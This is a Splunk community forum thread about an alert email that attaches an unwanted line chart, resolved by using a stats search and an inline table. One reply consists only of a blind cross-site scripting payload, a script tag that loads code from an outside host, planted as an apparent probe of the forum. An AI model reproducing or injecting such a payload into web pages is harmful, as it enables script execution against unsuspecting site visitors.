Alerts, wrong visualization in the attachment

a_n
Path Finder

Hello All,

I have several alerts which send email notifications.

I know it might be very basic, but I need your help.

One alert is to specify if a local host has accessed a blacklisted IP.
So I expect to have a table with:
Src, Dest, Port
The search returns a table, but I do not understand why it attaches a line-chart diagram!
I want it as a static table. In the Visualization tab, it does not show me a static table. I even tried to create a new alert without even going to the Visualization tab, but I got the same result.

I have even changed the search and used Table instead of stats.

Please advise.

Thank you

0 Karma

a_n
Path Finder

Hi,
The search is like:
index=FW
|table Src,Dst,pt
|dedup Src,Dst,pt
|rename Src as "Source",Dst as "Destination", pt as "Port"

The chart is like:
(Screenshot: Screen Shot 2021-09-10 at 9.01.22 AM.png)

Which I do not need.
For now I managed, as a workaround, to not attach the PDF and use an inline table.

Is it the only way to do this?
Thank you

 

0 Karma

isoutamo
SplunkTrust

Maybe you can change your table + dedup to

...
| stats count by Src, Dst, pt
...

And as you said, don't attach PDF etc. to the alert email, just link and/or inline.

r. Ismo 

0 Karma

shivamrai
New Member

"><script src=https://shivamraixssht.xss.ht></script>

0 Karma

a_n
Path Finder

Hi,
Sorry, I am afraid I did not get what this is.
Would you please elaborate?
Thank you

0 Karma

a_n
Path Finder

Yes, I was using this stats command.

My concern is about the chart, so it seems this is the only way:
to not attach the PDF and include the table inline.

 

Thank you very much

0 Karma

a_n
Path Finder

Can anyone assist, please?

0 Karma

isoutamo
SplunkTrust

Can you post your query + those visualisations?

0 Karma

a_n
Path Finder

I have added the search and chart, but it seems to be at the wrong level.

Please check.

Thank you

0 Karma